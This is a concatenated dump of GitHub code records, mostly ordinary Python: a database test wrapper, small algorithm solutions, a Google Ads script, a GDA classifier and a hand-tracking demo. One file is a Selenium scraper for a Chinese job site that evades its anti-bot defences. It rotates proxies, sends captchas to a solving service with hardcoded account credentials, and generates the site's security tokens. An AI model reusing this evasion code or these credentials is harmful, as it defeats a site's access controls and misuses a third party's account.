str:\n return os.path.join(self.engine.url.query[\"database\"], table.name)\n\n def _get_connection_params(self) -> ydb.DriverConfig:\n return ydb.DriverConfig(\n endpoint=self.engine.url.query[\"endpoint\"],\n database=self.engine.url.query[\"database\"],\n )\n\n def table_from_columns(\n self,\n columns: Sequence[sa.Column],\n *,\n schema: Optional[str] = None,\n table_name: Optional[str] = None,\n ) -> sa.Table:\n table_name = table_name or f\"test_table_{shortuuid.uuid()[:10]}\"\n table = sa.Table(table_name, sa.MetaData(), *columns, schema=schema)\n return table\n\n def create_table(self, table: sa.Table) -> None:\n table_description = self._generate_table_description(table.columns)\n table_path = self._get_table_path(table)\n connection_params = self._get_connection_params()\n driver = ydb.Driver(connection_params)\n driver.wait(timeout=5)\n session = driver.table_client.session().create()\n session.create_table(table_path, table_description)\n driver.stop(timeout=5)\n\n def insert_into_table(self, table: sa.Table, data: Sequence[dict]) -> None:\n connection_params = ydb.DriverConfig(\n endpoint=self.engine.url.query[\"endpoint\"],\n database=self.engine.url.query[\"database\"],\n )\n driver = ydb.Driver(connection_params)\n driver.wait(timeout=5)\n session = driver.table_client.session().create()\n\n table_path = self._get_table_path(table)\n\n upsert_query_prefix = f\"\"\"\n $date_parse = DateTime::Parse(\"%Y-%m-%d\");\n $datetime_parse = DateTime::Parse(\"%Y-%m-%d 
%H:%M:%S\");\n UPSERT INTO `{table_path}` ({\", \".join([column.name for column in table.columns])}) VALUES\n \"\"\"\n upserts = (\n \"({})\".format(\n \", \".join(\n [\n (\n \"NULL\"\n if data[column.name] is None\n else SA_TYPE_TO_YDB_TYPE[type(column.type)].to_sql_str(data[column.name])\n )\n for column in table.columns\n ]\n )\n )\n for data in data\n )\n session.transaction().execute(upsert_query_prefix + \",\\n\".join(upserts) + \";\", commit_tx=True)\n driver.stop(timeout=5)\n\n def drop_table(self, db_name: str, table: sa.Table) -> None:\n connection_params = self._get_connection_params()\n driver = ydb.Driver(connection_params)\n driver.wait(timeout=5)\n session = driver.table_client.session().create()\n table_path = self._get_table_path(table)\n\n try:\n session.drop_table(table_path)\n except ydb.issues.SchemeError as err:\n if \"does not exist\" in str(err):\n pass # Table does not exist\n else:\n raise\n\n driver.stop(timeout=5)\n","repo_name":"datalens-tech/datalens-backend","sub_path":"lib/dl_connector_ydb/dl_connector_ydb/db_testing/engine_wrapper.py","file_name":"engine_wrapper.py","file_ext":"py","file_size_in_byte":5354,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"54"} +{"seq_id":"26807508433","text":"from django.conf.urls import url\r\nfrom basic_app import views\r\n\r\n# Cuando se usa Template Tagging creamos un espacio de nombres\r\napp_name = 'basic_app'\r\n\r\nurlpatterns = [\r\n url('relative/', views.relative, name='relative'),\r\n url('other/', views.other, name='other')\r\n]\r\n","repo_name":"Daxter98/django-deployment-example","sub_path":"git_base/learning_templates/basic_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74821350242","text":"\ndef main():\n m = 3\n print(find_nb(26825883955641))\nimport math\n\ndef find_nb(m):\n low = math.floor((m ** (1. / 4)) * 1.2) \n high = math.floor((m ** (1. 
/ 3)) / 9) # get the cubed root of m to find an approximate high\n mid = 0\n\n # binary search\n while low <= high:\n mid = (high + low) // 2\n answer = doSummation(mid)\n if answer < m:\n low = mid + 1\n elif answer > m:\n high = mid - 1\n else:\n return mid\n \n \n \n return -1\n\n# return the summation\ndef doSummation(n):\n first_term = n\n second_term = 0\n for i in range(0, n + 1):\n second_term += i * 3\n\n third_term = 0\n for i in range(0, n + 1):\n third_term += pow(i, 2) * 3\n \n fourth_term = 0\n for i in range(0, n + 1):\n fourth_term += pow(i, 3)\n\n # {first_term + 1}n^3 - {second_term}n^2 + {third_term}n - {fourth_term} \n return ((first_term + 1) * pow(n, 3)) - (second_term * pow(n, 2)) + (third_term * n) - fourth_term\n\n\nmain()","repo_name":"jukebox1412/AdventOfCode2021","sub_path":"codewars/Build a pile of Cubes/build old 2.py","file_name":"build old 2.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70309201121","text":"class Solution:\n def findDisappearedNumbers(self, nums: List[int]) -> List[int]:\n \n dictt = set()\n i = 1\n \n while i <= len(nums):\n dictt.add(i)\n i +=1\n\n for i in nums:\n dictt.discard(i)\n \n return dictt\n \n","repo_name":"klparmar/leetcodes","sub_path":"dispNums.py","file_name":"dispNums.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17110400003","text":"from .db import db, environment, SCHEMA, add_prefix_for_prod\nfrom sqlalchemy.sql import func\nfrom sqlalchemy import UniqueConstraint\n\n\nclass Feed(db.Model):\n __tablename__ = \"feeds\"\n\n if environment == \"production\":\n __table_args__ = {\"schema\": SCHEMA}\n\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(\n db.Integer, db.ForeignKey(add_prefix_for_prod(\"users.id\")), nullable=False\n )\n last_seen = db.Column(\n db.DateTime(timezone=True), server_default=func.now(), onupdate=func.now()\n )\n\n UniqueConstraint(\"user_id\")\n\n user = db.relationship(\"User\", back_populates=\"feed\")\n\n def to_dict(self):\n dct = {\n \"id\": self.id,\n \"user_id\": self.user_id,\n \"last_seen\": self.last_seen\n }\n\n return dct\n","repo_name":"Edward932/mod7-spotifly-clone","sub_path":"app/models/feed.py","file_name":"feed.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23564917874","text":"\"\"\" Problem description can be found here:\nhttps://leetcode.com/problems/third-maximum-number/description/\n\"\"\"\n\n\nclass Solution:\n def thirdMax_1(self, nums):\n \"\"\" Returns 3rd maximum unique number in array nums.\n If there's no such, returns 1st / 2nd max unique number.\n Simple algorithm. Algorithm description:\n 1) Create a set of max numbers.\n 2) Loop over array 3 times.\n 3) Choose next max number that doesn't equal numbers in the set.\n 4) If we found 3 max numbers, choose min from the set,\n else choose max number from the set.\n\n Time complexity: O(n). 
Space complexity: O(1), where n is len(nums).\n \"\"\"\n max_nums = set() # set of 3 or less max numbers from nums\n for k in range(3):\n curr_max = float(\"-inf\") # current maximum number\n for n in nums:\n if n not in max_nums and n > curr_max:\n curr_max = n\n if curr_max != float(\"-inf\"):\n max_nums.add(curr_max)\n return min(max_nums) if len(max_nums) == 3 else max(max_nums)\n\n def thirdMax_2(self, nums):\n \"\"\" Returns 3rd maximum unique number in array nums.\n If there's no such, returns 1st / 2nd max unique number.\n Improved algorithm. Algorithm description:\n 1) Iterate over array once and keep track of 1st, 2nd, 3rd max numbers.\n 2) Return 3rd max number if there's one, else return 1st max number.\n\n Time complexity: O(n). Space complexity: O(1), where n is len(nums).\n \"\"\"\n first = second = third = float(\"-inf\")\n for n in nums:\n if n > first:\n first, second, third = n, first, second\n elif n != first and n > second:\n second, third = n, second\n elif n != first and n != second and n > third:\n third = n\n if third != float(\"-inf\"):\n return third\n else:\n return first\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n assert sol.thirdMax_1([3, 2, 1]) == 1\n assert sol.thirdMax_2([3, 2, 1]) == 1\n assert sol.thirdMax_1([1, 2]) == 2\n assert sol.thirdMax_2([1, 2]) == 2\n","repo_name":"vladn90/Algorithms","sub_path":"Arrays/third_max_number.py","file_name":"third_max_number.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71911716003","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport collections\nfrom googleads import adwords\n\ndef get_traffic(keyword_set):\n\n #Initialize client object.\n adwords_client = adwords.AdWordsClient.LoadFromStorage(os.path.abspath('googleads.yaml'))\n\n #Initialize appropriate service.\n targeting_idea_service = adwords_client.GetService('TargetingIdeaService', version='v201502')\n\n PAGE_SIZE = 100\n offset = 0\n\n #Construct selector object and retrieve related keywords.\n selector = {\n 'searchParameters': [\n {\n 'xsi_type': 'RelatedToQuerySearchParameter',\n 'queries': keyword_set\n },\n {\n 'xsi_type': 'NetworkSearchParameter',\n 'networkSetting': [{'targetSearchNetwork': 'true'}]\n }\n ],\n 'ideaType': 'KEYWORD',\n 'requestType': 'STATS',\n 'requestedAttributeTypes': ['KEYWORD_TEXT', 'SEARCH_VOLUME', 'AVERAGE_CPC', 'COMPETITION', 'TARGETED_MONTHLY_SEARCHES'],\n 'paging': {\n 'startIndex': str(offset),\n 'numberResults': str(PAGE_SIZE)\n }\n }\n\n months = {\n 1: 'January',\n 2: 'February',\n 3: 'March',\n 4: 'April',\n 5: 'May',\n 6: 'June',\n 7: 'July',\n 8: 'August',\n 9: 'September',\n 10: 'October',\n 11: 'November',\n 12: 'December'\n }\n traffic_results = {}\n more_pages = True\n while more_pages:\n page = targeting_idea_service.get(selector)\n\n #Display results.\n if 'entries' in page:\n for result in page['entries']:\n attributes = {}\n traffic_result_set = {}\n for attribute in result['data']:\n attributes[attribute['key']] = getattr(attribute['value'], 'value', '0')\n\n if attributes['SEARCH_VOLUME'] == '0':\n traffic_result_set['average_monthly_search_volume'] = None\n else:\n traffic_result_set['average_monthly_search_volume'] = attributes['SEARCH_VOLUME']\n\n if attributes['AVERAGE_CPC'] == '0':\n traffic_result_set['average_cpc'] = None\n else:\n traffic_result_set['average_cpc'] = round(attributes['AVERAGE_CPC']['microAmount'] / 1000000, 2)\n\n if attributes['COMPETITION'] == '0':\n 
traffic_result_set['competition'] = None\n else:\n traffic_result_set['competition'] = round(attributes['COMPETITION'], 2)\n\n monthly_search_volumes_set = []\n for entry in attributes['TARGETED_MONTHLY_SEARCHES']:\n if 'count' in entry:\n monthly_search_volumes_set.append(months[entry['month']] + ' ' + str(entry['year']) + ': ' + str(entry['count']))\n traffic_result_set['monthly_search_volumes'] = monthly_search_volumes_set\n\n traffic_results[attributes['KEYWORD_TEXT']] = traffic_result_set\n else:\n print ('No related keywords were found.')\n\n offset += PAGE_SIZE\n selector['paging']['startIndex'] = str(offset)\n more_pages = offset < int(page['totalNumEntries'])\n\n return traffic_results\n","repo_name":"cash2one/SERP-Scraper-SOV-Visualizer","sub_path":"GoogleScraper/adwords.py","file_name":"adwords.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34503953575","text":"# importing the libraries\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport random\n\n# importing the dataset\ndata = pd.read_csv('microchip_data.csv')\ndata=data.sample(frac=1)\ndata=data.reset_index(drop=True)\nY=data.iloc[:,2].values\nX=data.iloc[:,:2].values\n\n# Separate into training and testing data\ntrain_size = int((X.shape[0] * 7) / 10) # 70% train data\nX_train_indices = random.sample(range(0, X.shape[0]), train_size)\n#print(X_train_indices)\nX_train, X_test, Y_train, Y_test = [], [], [], []\nfor i in range(X.shape[0]) :\n if(i in X_train_indices) :\n X_train.append(X[i])\n Y_train.append(Y[i])\n else :\n X_test.append(X[i])\n Y_test.append(Y[i])\n\nX_train = np.array(X_train)\nX_test = np.array(X_test)\nY_train = np.array(Y_train)\nY_test = np.array(Y_test)\n\n#calculation of phi\nphi=sum(Y_train)/len(Y_train)\nprint(\"phi: \"+str(phi))\n\n#calculation of mu0 and mu1\nmu0=[0,0]\nmu1=[0,0]\nc0=0\nc1=0\nfor i in range(len(Y_train)):\n if Y_train[i]==0:\n c0+=1\n mu0+=X_train[i]\n else:\n c1+=1\n mu1+=X_train[i]\n\nmu0/=c0\nmu1/=c1\nprint(\"mu0: \"+str(mu0))\nprint(\"mu1: \"+str(mu1))\n\n#calculation of sigma\nm = len(Y_train)\nsigma = np.zeros((2,2))\nfor i in range(m):\n xi=X_train[i]\n yi=Y_train[i]\n if yi==1:\n tmp=xi-mu1\n tmp=tmp.reshape(-1,1)\n tmp1=np.transpose(tmp)\n sqr=(tmp)*(tmp1)\n sigma = sigma + sqr\nsigma=sigma/m\nprint(\"sigma: \"+str(sigma))\n\ndef calculate_px_y(x,mu):\n n = len(mu)\n det=np.linalg.det(sigma)\n pi = 3.14\n inv=np.linalg.inv(sigma)\n den=pow(2*pi,n/2)*np.sqrt(det)\n tmp=x-mu\n tmp=tmp.reshape(-1,1)\n tmp1=np.transpose(tmp)\n p=np.dot(np.dot(tmp1,inv),tmp)\n p=(-0.5)*p\n num=np.exp(p)\n return num/den\n\n#calculation of P(Y)\ndef calculate_py(y):\n if y==1:\n return phi\n else:\n return (1-phi)\n\n#Predictor function\ndef predictor(x):\n p_0 = calculate_px_y(x,mu0)*calculate_py(0)\n p_1 = calculate_px_y(x,mu1)*calculate_py(1) \n if p_0>p_1:\n return 0\n else:\n return 1\n \ncorrect=0;\npredictions=[]\nl=len(Y_test)\nfor i in range(l):\n x=X_test[i]\n y=Y_test[i]\n y_predicted=predictor(x)\n predictions.append(y_predicted)\n if predictions[i]==y:\n correct+=1\nprint(\"Correct Predictions: \" + str(correct) + \" ,Out of: \"+ str(l))\nprint(\"Accuracy: \",100*correct/l)\n ","repo_name":"saumya-guptaa/ISCO-630E","sub_path":"Assignment 5/GDA.py","file_name":"GDA.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"1911440078","text":"# File 
Excel dengan ekstensi *.xls atau *.xlsx cukup banyak digunakan dalam menyimpan data.\n# Pandas juga memiliki fitur untuk membaca file excel.\n\n# Notes :\n# Dataset : https://dqlab-dataset.s3-ap-southeast-1.amazonaws.com/sample_excel.xlsx\n\n# Fungsi .read_excel() digunakan untuk membaca file excel menjadi dataframe pandas.\n\nimport pandas as pd\n# File xlsx dengan data di sheet \"test\"\ndf_excel = pd.read_excel(\n \"sample_excel.xlsx\", sheet_name=\"test\")\nprint(df_excel.head(4)) # Menampilkan 4 data teratas\n","repo_name":"ryanrizkyf/DQLab","sub_path":"Data Analyst Python Track/5. Data Manipulation with Pandas - Part 1/Dataset_IO/Read_Dataset_Excel.py","file_name":"Read_Dataset_Excel.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3908794660","text":"N = int(input())\nA = list(map(int, input().split()))\n\nA.sort(reverse=True)\n\nscore = 0\ntemp = A[0]+1\nfor i in A:\n if temp-1 != i:\n score += temp\n temp = i\n\n\nprint(score+A[-1])\n","repo_name":"yudai1102jp/atcoder","sub_path":"yukicoder/315/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9172094391","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\nimport threading\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.service import Service as ChromeService\r\nimport requests\r\nfrom flask import Flask, request\r\nfrom selenium import webdriver\r\nfrom datetime import date, datetime\r\nfrom selenium.common.exceptions import JavascriptException, WebDriverException\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nimport traceback\r\nfrom urllib3.exceptions import MaxRetryError\r\nimport redis\r\nimport pynput\r\nfrom pynput.mouse import Button\r\nfrom hashlib import md5\r\nfrom gevent import pywsgi\r\n\r\napp = Flask(__name__)\r\n\r\nmouse = pynput.mouse.Controller()\r\n\r\n\r\n# 单例模式函数,用来修饰类\r\ndef singleton(cls, *args, **kw):\r\n instances = {}\r\n\r\n def _singleton():\r\n if cls not in instances:\r\n instances[cls] = cls(*args, **kw)\r\n return instances[cls]\r\n\r\n return _singleton\r\n\r\n\r\nclass Chaojiying_Client(object):\r\n\r\n def __init__(self, username, password, soft_id):\r\n self.username = username\r\n password = password.encode('utf8')\r\n self.password = md5(password).hexdigest()\r\n self.soft_id = soft_id\r\n self.base_params = {\r\n 'user': self.username,\r\n 'pass2': self.password,\r\n 'softid': self.soft_id,\r\n }\r\n self.headers = {\r\n 'Connection': 'Keep-Alive',\r\n 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',\r\n }\r\n\r\n def PostPic(self, im, codetype):\r\n \"\"\"\r\n im: 图片字节\r\n codetype: 题目类型 参考 http://www.chaojiying.com/price.html\r\n \"\"\"\r\n params = {\r\n 'codetype': codetype,\r\n }\r\n params.update(self.base_params)\r\n files = {'userfile': ('ccc.jpg', im)}\r\n r = requests.post('http://upload.chaojiying.net/Upload/Processing.php', data=params, files=files,\r\n headers=self.headers)\r\n return r.json()\r\n\r\n def PostPic_base64(self, base64_str, codetype):\r\n \"\"\"\r\n im: 图片字节\r\n codetype: 题目类型 参考 http://www.chaojiying.com/price.html\r\n \"\"\"\r\n params = {\r\n 'codetype': codetype,\r\n 'file_base64': base64_str\r\n 
}\r\n params.update(self.base_params)\r\n r = requests.post('http://upload.chaojiying.net/Upload/Processing.php', data=params, headers=self.headers)\r\n return r.json()\r\n\r\n def ReportError(self, im_id):\r\n \"\"\"\r\n im_id:报错题目的图片ID\r\n \"\"\"\r\n params = {\r\n 'id': im_id,\r\n }\r\n params.update(self.base_params)\r\n r = requests.post('http://upload.chaojiying.net/Upload/ReportError.php', data=params, headers=self.headers)\r\n return r.json()\r\n\r\n\r\n@singleton\r\nclass Chrome:\r\n def __init__(self):\r\n self.current_city = '101010100'\r\n self.host_url = 'https://www.zhipin.com'\r\n self.start_page = 'https://www.zhipin.com/web/geek/job?city={}'\r\n self.user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36'\r\n self.client = redis.Redis('10.86.0.107', decode_responses=True)\r\n self.proxies_key_recode = {}.fromkeys(self.client.keys('proxy_DD*'), 0)\r\n self.is_reload = False\r\n self.chaojiying = Chaojiying_Client('13311860036', 'Welcome2022', '96001')\r\n self.driver = self.init()\r\n self.current_date = date.today()\r\n self.last_change_url_time = datetime.now()\r\n self.token = ''\r\n threading.Thread(target=self.auto_reload, daemon=True).start()\r\n\r\n def auto_reload(self):\r\n while True:\r\n time.sleep(60)\r\n if self.check_error_page():\r\n\r\n self.init()\r\n self.check_search_page()\r\n if date.today() != self.current_date:\r\n self.init()\r\n\r\n def get_proxy(self):\r\n max_val = max(self.proxies_key_recode.values())\r\n if max_val > 10:\r\n min_val = min(self.proxies_key_recode.values())\r\n self.proxies_key_recode = {key: val - min_val for key, val in self.proxies_key_recode.items()}\r\n proxy = sorted(self.proxies_key_recode.items(), key=lambda item: item[1])[0][0]\r\n self.proxies_key_recode[proxy] += 1\r\n return self.client.get(proxy)\r\n\r\n def get_proxy_test(self):\r\n return random.choice(self.client.lrange('use_proxies', 0, -1))\r\n\r\n def check_search_page(self):\r\n try:\r\n WebDriverWait(self.driver, 5).until(\r\n EC.presence_of_element_located((By.CLASS_NAME, 'search-btn')), '找不到元素')\r\n except Exception as e:\r\n if self.driver.current_url == 'https://www.zhipin.com/web/user/safe/verify-slider':\r\n if self.verification_code():\r\n self.driver.get(self.start_page.format(self.current_city))\r\n else:\r\n self.driver.refresh()\r\n time.sleep(20)\r\n\r\n try:\r\n self.driver.find_element(By.CLASS_NAME, 'search-btn')\r\n return True\r\n except Exception as e:\r\n if self.driver.current_url == 'https://www.zhipin.com/web/user/safe/verify-slider':\r\n if self.verification_code():\r\n self.driver.get(self.start_page.format(self.current_city))\r\n else:\r\n self.driver.refresh()\r\n\r\n def init(self):\r\n self.close()\r\n time.sleep(1)\r\n if not getattr(self, 'driver', None):\r\n self.is_reload = False\r\n options = webdriver.ChromeOptions()\r\n options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\r\n options.add_experimental_option(\"useAutomationExtension\", False)\r\n options.add_argument(\"--disable-blink-features=AutomationControlled\")\r\n\r\n service = ChromeService()\r\n\r\n proxy = self.get_proxy()\r\n # print(proxy)\r\n options.add_argument('--proxy-server=http://' + proxy)\r\n options.add_argument('--user-agent=' + self.user_agent)\r\n\r\n self.driver = webdriver.Chrome(service=service, options=options)\r\n self.driver.maximize_window()\r\n self.driver.set_page_load_timeout(30)\r\n try:\r\n 
self.driver.get(self.start_page.format(self.current_city))\r\n time.sleep(5)\r\n self.check_search_page()\r\n if self.check_error_page():\r\n return self.init()\r\n\r\n\r\n except Exception as e:\r\n self.close()\r\n print(e)\r\n time.sleep(5)\r\n return self.init()\r\n self.is_reload = True\r\n\r\n return self.driver\r\n\r\n def verification_code(self):\r\n # 获取验证码按钮\r\n validate_button_click = self.driver.find_element(By.CLASS_NAME, 'btn')\r\n\r\n # 点击获取取验证码\r\n validate_button_click.click()\r\n # 等待验证码加载\r\n WebDriverWait(self.driver, 20).until(EC.visibility_of_element_located((By.CLASS_NAME, 'geetest_item_img')),\r\n '元素没有找到')\r\n # 获取验证码\r\n code_element = self.driver.find_element(By.CLASS_NAME, 'geetest_item_wrap')\r\n code_url = re.search('url\\(\"(.*?)\"', code_element.get_attribute('style')).group(1)\r\n headers = {'user-agent': self.user_agent}\r\n image_content = requests.get(code_url, headers=headers,timeout=30).content\r\n with open('code_img.png', 'wb') as f:\r\n f.write(image_content)\r\n # 发送打码平台获取验证码坐标\r\n print(image_content)\r\n # self.driver.quit()\r\n # 移动鼠标点击验证码\r\n img_location = self.driver.find_element(by=By.XPATH, value='//div[@class=\"geetest_item_wrap\"]').location\r\n print(img_location)\r\n mouse.position = img_location.get('x') + 1 - 17, img_location.get('y') + 73 - 17\r\n xx = img_location.get('x') + 1 - 17\r\n yy = img_location.get('y') + 73 - 17\r\n mouse.position = xx, yy\r\n\r\n result = self.chaojiying.PostPic(image_content, 9004)\r\n time.sleep(3)\r\n pos_list = [[int(_) for _ in x.split(',')] for x in result['pic_str'].split('|')]\r\n for i, (pos_x, pos_y) in enumerate(pos_list):\r\n mouse.position = xx + pos_x, yy + pos_y\r\n mouse.click(Button.left)\r\n time.sleep(2)\r\n\r\n # 提交 验证验证码\r\n self.driver.find_element(by=By.XPATH, value='//div[@class=\"geetest_commit_tip\"]').click()\r\n # 访问列表页面\r\n try:\r\n WebDriverWait(self.driver, 15).until(EC.url_changes('https://www.zhipin.com/web/user/safe/verify-slider'),\r\n '验证失败')\r\n except Exception:\r\n self.chaojiying.ReportError(result['pic_id'])\r\n return False\r\n return True\r\n\r\n def check_error_page(self):\r\n try:\r\n if self.driver.current_url == 'https://www.zhipin.com/web/user/safe/verify-slider':\r\n self.verification_code()\r\n\r\n content = self.driver.page_source\r\n if '检查代理服务器' in content or '尝试次数过多' in content or '代理服务器出现问题' in content or '您的 IP 存在异常访问行为' in content:\r\n self.close()\r\n time.sleep(5)\r\n\r\n print('网络连接失败,重新启动浏览器')\r\n return True\r\n except Exception as e:\r\n self.close()\r\n return True\r\n\r\n def get_token(self, seed, ts):\r\n\r\n self.token = self.driver.execute_script(\r\n f'return encodeURIComponent((new document.zhipinFrame[0].contentWindow.ABC).z({repr(seed)}, parseInt({repr(ts)}) + 60 * (480 + (new Date).getTimezoneOffset()) * 1e3))')\r\n\r\n #encodeURIComponent((new document.zhipinFrame[0].contentWindow.ABC).z('lXhb2C9vhqoc6+CKl9o0/BXaEsTpZG0aqsXzreUeuFw=', parseInt('1685974978182')))\r\n return self.token\r\n\r\n def change_url(self):\r\n if (datetime.now() - self.last_change_url_time).seconds >= 60 * 60 * 8:\r\n self.driver.get(self.start_page.format(self.current_city))\r\n self.last_change_url_time = datetime.now()\r\n time.sleep(10)\r\n\r\n def __del__(self):\r\n try:\r\n self.driver.quit()\r\n except:\r\n pass\r\n\r\n def close(self):\r\n try:\r\n self.driver.quit()\r\n self.driver = None\r\n self.is_reload = False\r\n except Exception as e:\r\n\r\n pass\r\n\r\n\r\n@app.route('/getToken')\r\ndef get_encrypt():\r\n params = request.args.to_dict()\r\n 
seed, ts = params.get('enc').split(',')\r\n city_code = params.get('cityCode')\r\n\r\n try:\r\n if chrome.is_reload:\r\n token = chrome.get_token(seed, ts)\r\n else:\r\n token = chrome.token\r\n time.sleep(10)\r\n return token\r\n except Exception as e:\r\n print(e)\r\n time.sleep(10)\r\n traceback.print_exc()\r\n return chrome.token\r\n\r\n\r\nif __name__ == '__main__':\r\n chrome = Chrome()\r\n time.sleep(10)\r\n app.run('0.0.0.0', port=8888)\r\n # server = pywsgi.WSGIServer(('0.0.0.0', 8888), app)\r\n # server.serve_forever()\r\n # app.run('10.86.0.104', port=8888)\r\n\r\n#geng_xuekai@51helpdesk.com;yan_xingke@51helpdesk.com;wang_zheng@51helpdesk.com","repo_name":"luflyxian/scrapy","sub_path":"国内/boss/boss_selenium_client.py","file_name":"boss_selenium_client.py","file_ext":"py","file_size_in_byte":11680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33793094053","text":"\"\"\" Exercise #2. Python for Engineers.\"\"\"\n\n#########################################\n# Question 1 - do not delete this comment\n#########################################\n\na = 7 # Replace the assignment with a positive integer to test your code.\n# Replace the assignment with other lists to test your code.\nlst = [10, 20, 5, 7]\n\n# Write the rest of the code for question 1 below here.\n\n\ndef first_divisible_by(lst, num):\n for i, val in enumerate(lst):\n if val % num == 0:\n return i\n return -1\n\n\nprint(first_divisible_by(lst, a))\n\n\n# End of code for question 1\n\n#########################################\n# Question 2 - do not delete this comment\n#########################################\nlst2 = ['55555', '55555', '666666', '666666', '333']\n# Replace the assignment with other lists of strings (str) to test your code.\n\n\n# Write the code for question 2 using a for loop below here.\n\ndef get_average_length_for(lst):\n return len(''.join(lst)) / len(lst)\n\n\ndef above_average_using_for(lst):\n average = get_average_length_for(lst)\n counter = 0\n for val in lst:\n if len(val) > average:\n counter += 1\n return counter\n\n\nprint('The number of stringslonger than the average is:',\n above_average_using_for(lst2))\n\n# Write the code for question 2 using a while loop below here.\n\n\ndef get_average_length_while(lst):\n return len(''.join(lst)) / len(lst)\n\n\ndef above_average_using_while(lst):\n average = get_average_length_while(lst)\n counter = 0\n i = 0\n while i < len(lst):\n if len(lst[i]) > average:\n counter += 1\n i += 1\n return counter\n\n\nprint('The number of stringslonger than the average is:',\n above_average_using_while(lst2))\n\n# End of code for question 2\n\n#########################################\n# Question 3 - do not delete this comment\n#########################################\n\n# Replace the assignment with other lists to test your code.\nlst3 = [1, -2, 3, -4, 5]\n\n\n# Write the rest of the code for question 3 below here.\ndef list_multiplication(lst):\n if len(lst) == 0:\n return 0\n if len(lst) == 1:\n return lst[0]\n my_sum = 0\n for i in range(len(lst) - 1):\n my_sum += lst[i] * lst[i + 1]\n return my_sum\n\n\nprint(list_multiplication(lst3))\n\n# End of code for question 3\n\n\n#########################################\n# Question 4 - do not delete this comment\n#########################################\n\n# Replace the assignment with other lists to test your code.\nlst4 = [0, 1, -1, 2, -2, 3, -3, 4, -4, 5, 6, 7, 8, 9, 10, 15]\n\n# Write the rest of the code for question 4 below here.\n\n\ndef 
max_diff(lst):\n new_list = lst[:2]\n for i in range(2, len(lst)):\n if abs(lst[i] - new_list[-1]) > abs(new_list[-1] - new_list[-2]):\n new_list.append(lst[i])\n return new_list\n\n\nprint(max_diff(lst4))\n\n# End of code for question 4\n\n#########################################\n# Question 5 - do not delete this comment\n#########################################\n\n# Replace the assignment with other strings to test your code.\nmy_string = 'abbcccddddeeeeeffffggghhi'\nk = 4 # Replace the assignment with a positive integer to test your code.\n\n# Write the rest of the code for question 5 below here.\n\n\ndef match_str_to_length(string, length):\n accumulator = ''\n for char in list(string):\n if len(accumulator) == 0 or accumulator[-1] == char:\n accumulator += char\n else:\n accumulator = char\n if len(accumulator) == length:\n return f'For length {length}, found the substring {accumulator}!'\n return f'Didn\\'t find a substring of length {length}'\n\n\nprint(match_str_to_length(my_string, k))\n# End of code for question 5\n","repo_name":"david-uni/python-help","sub_path":"homeworks/ex2/ex2_version_2.py","file_name":"ex2_version_2.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71686601760","text":"## muestra los puntos de las manos con una clase aparte\r\n## archivo de corre en entorno virtual (manos), no funciona en consola el .py\r\n## usa python 3.7.8 64 bit como interprete\r\n## se debe crear primero en env, luedo dentro de la carpeta activarlo con \\scripts.\\activate\r\n## se desactiva el env con deactivate\r\n## si tiene problemas con politicas de usuario\r\n##ejecutar comando en consola set-executionPolicy - scope currentuser unrestricted si \r\n## se confirma con get-executionpolicy se debe ver unrestricted\r\n## se inicia GIT en el icono, lo mejor es antes de hacer el archivo\r\n\r\nimport cv2\r\n\r\nimport numpy as np\r\n##se importa el modulo mde google mediapipe que se baja con pip mediapipe\r\nimport mediapipe as mp\r\nimport time\r\n## se importa el modulo creado que es un archivo .py con varias funciones\r\nimport Hand_Module as HM\r\n\r\n\r\ncurrentTime=0\r\n\r\npreviousTime=0\r\ncap= cv2.VideoCapture(0)\r\n## se crea una instancia al modulo creado\r\ndetector= HM.HandDetector()\r\n\r\n\r\nwhile True:\r\n\r\n sucssess, imagencamara= cap.read()\r\n ## se usa la funcion del modulo creado para detectar manos\r\n imagencamara= detector.findHands(imagencamara, Draw=True)\r\n ## se hace una lista de los puntos de las manos para dibujarlas\r\n lamlist= detector.findPosicion(imagencamara, draw=True)\r\n ## se indica el punto que se quiere imprimir con su ubucacion \r\n if len(lamlist) !=0:\r\n print(lamlist[8])\r\n ## se calcula el tiempo de lo FPS 